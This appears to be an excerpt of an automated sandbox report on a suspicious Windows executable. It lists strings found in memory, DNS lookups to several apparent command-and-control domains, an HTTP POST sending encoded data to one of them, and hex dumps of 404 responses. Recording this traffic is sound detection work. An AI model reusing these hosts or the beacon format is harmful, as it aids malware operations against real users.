                Source: where.exe, 0000000A.00000002.2257590860.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2255228897.00000000055F6000.00000004.10000000.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
                Source: where.exe, 0000000A.00000002.2255228897.00000000055F6000.00000004.10000000.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100 equals www.facebook.com (Facebook)
                Source: where.exe, 0000000A.00000002.2257590860.0000000007AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
                Source: global trafficDNS traffic detected: DNS query: www.michaelaowen.xyz
                Source: global trafficDNS traffic detected: DNS query: www.peetzlifestyle.net
                Source: global trafficDNS traffic detected: DNS query: www.perfumedeparis.store
                Source: global trafficDNS traffic detected: DNS query: www.livream.live
                Source: global trafficDNS traffic detected: DNS query: api.msn.com
                Source: unknownHTTP traffic detected: POST /z9w1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USHost: www.peetzlifestyle.netConnection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 208Origin: http://www.peetzlifestyle.netReferer: http://www.peetzlifestyle.net/z9w1/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36Data Raw: 43 38 72 3d 42 64 32 35 72 5a 37 2f 2b 73 77 6a 36 77 42 39 38 4c 6d 6b 47 35 41 69 53 78 56 64 62 35 70 73 2b 73 56 54 6f 31 54 77 35 4b 73 53 4e 62 4f 72 57 34 31 56 5a 4b 48 31 4c 48 52 51 66 70 68 43 51 4c 53 5a 41 42 61 43 4a 33 31 47 6b 68 6e 44 59 6f 4e 68 48 75 61 72 2b 31 6b 59 38 64 79 54 79 4c 34 4e 72 58 35 71 75 67 7a 76 4a 6b 76 4e 54 69 53 48 49 75 54 52 77 39 56 77 34 6c 30 32 39 64 5a 68 42 6a 73 49 6d 64 70 76 36 33 56 70 35 4b 71 61 53 78 55 4c 75 38 64 72 33 32 53 4d 59 57 79 6e 70 48 72 61 59 4f 6b 64 4d 4f 4b 4f 2f 68 66 63 72 4e 37 34 51 4f 48 57 32 71 42 6d 53 79 4c 65 65 72 31 7a 47 4c 35 68 Data Ascii: C8r=Bd25rZ7/+swj6wB98LmkG5AiSxVdb5ps+sVTo1Tw5KsSNbOrW41VZKH1LHRQfphCQLSZABaCJ31GkhnDYoNhHuar+1kY8dyTyL4NrX5qugzvJkvNTiSHIuTRw9Vw4l029dZhBjsImdpv63Vp5KqaSxULu8dr32SMYWynpHraYOkdMOKO/hfcrN74QOHW2qBmSyLeer1zGL5h
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: a08df43a-7cea-4dd6-85df-2b9a4722a335x-runtime: 0.041838content-length: 17114connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 62267b30-d04d-41e9-89c0-ac99703e660dx-runtime: 0.108470content-length: 17138connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: d098280c-9490-4fac-859d-a1768a63a996x-runtime: 0.051089content-length: 17298connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 07:51:02 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 07:51:04 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 07:51:07 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 